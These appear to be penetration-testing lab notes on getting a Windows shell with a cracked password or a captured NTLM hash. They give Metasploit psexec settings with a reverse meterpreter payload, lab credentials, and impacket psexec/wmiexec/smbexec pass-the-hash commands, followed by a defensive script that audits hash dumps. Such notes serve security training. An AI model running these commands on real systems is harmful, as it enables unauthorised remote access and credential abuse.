Gaining Shell Access

  1. Do it with the cracked password (LLMNR and Cracking captured Hashes)

Metasploit

search psexec
use exploit/windows/smb/psexec #index numbers from search (e.g. "use 4") shift between versions, so use the full module path
set payload windows/x64/meterpreter/reverse_tcp
set rhosts 192.168.218.138
set smbdomain MARVEL.local
set smbuser fcastle
set smbpass Password1
options #to review everything
show targets
set target 1 #not needed, just as a concept

psexec.py:

psexec.py MARVEL/fcastle:'Password1'@192.168.218.138
OR
psexec.py MARVEL/fcastle:@192.168.218.139
#and password when prompted
psexec.py administrator@192.168.218.139 -hashes aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f

  2. Do it with a hash (SMB Relay Attacks (NTLM))

Metasploit (same psexec module, with the hash in place of the password):

set smbuser administrator
unset smbdomain
set smbpass aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f

Hash explained:

Full line as dumped (user:RID:LM:NT:::); the LM:NT pair is what relay and pass-the-hash use:

Administrator:500:aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f:::

LM: (this value is the well-known LM hash of an empty password, i.e. no real LM hash is stored)

aad3b435b51404eeaad3b435b51404ee

NT: (only this portion is needed for cracking)

7facdc498ed1680c4fd1448319a8c04f
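As an added example (not from the original notes), a small auditor for the dump line format explained above: it splits user:RID:LM:NT::: lines, validates the hex fields, and flags accounts that still store a real LM hash (LM hashing enabled) or are the built-in RID 500 Administrator. The second sample line and its hex values are constructed, not real hashes.

```python
import re

# Well-known LM hash of the empty string: dump tools print it when no LM hash is
# stored (LM hashing disabled), so it carries no password material.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
HEX32 = re.compile(r"^[0-9a-f]{32}$")

def parse_hash_line(line):
    """Parse one pwdump-style line (user:rid:lmhash:nthash:::).
    Returns a dict, or None if the line does not match the format."""
    parts = line.strip().split(":")
    if len(parts) < 4:
        return None
    user, rid, lm, nt = parts[0], parts[1], parts[2].lower(), parts[3].lower()
    if not rid.isdigit() or not HEX32.match(lm) or not HEX32.match(nt):
        return None
    return {
        "user": user,
        "rid": int(rid),
        "lm": lm,
        "nt": nt,
        "lm_stored": lm != EMPTY_LM,      # a real LM hash means LM hashing is enabled
        "builtin_admin": int(rid) == 500, # RID 500 is always the built-in Administrator
    }

def audit_dump(lines):
    """Return (user, [issues]) for every well-formed line; malformed lines are skipped."""
    findings = []
    for line in lines:
        rec = parse_hash_line(line)
        if rec is None:
            continue
        issues = []
        if rec["lm_stored"]:
            issues.append("LM hash stored (LM hashing enabled)")
        if rec["builtin_admin"]:
            issues.append("built-in Administrator (RID 500)")
        findings.append((rec["user"], issues))
    return findings

# Constructed sample: the Administrator line from the notes, plus a made-up
# account with an arbitrary (not real) LM hash, plus one malformed line.
SAMPLE = [
    "Administrator:500:aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f:::",
    "legacyuser:1105:0123456789abcdef0123456789abcdef:fedcba9876543210fedcba9876543210:::",
    "garbage line",
]

if __name__ == "__main__":
    for user, issues in audit_dump(SAMPLE):
        print(user, "->", "; ".join(issues) or "no findings")
```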

If psexec is getting blocked, you can use:

wmiexec.py administrator@192.168.218.138 -hashes aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f

OR

smbexec.py administrator@192.168.218.138 -hashes aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f
#-hashes takes the full LM:NT pair, the same form as for psexec.py above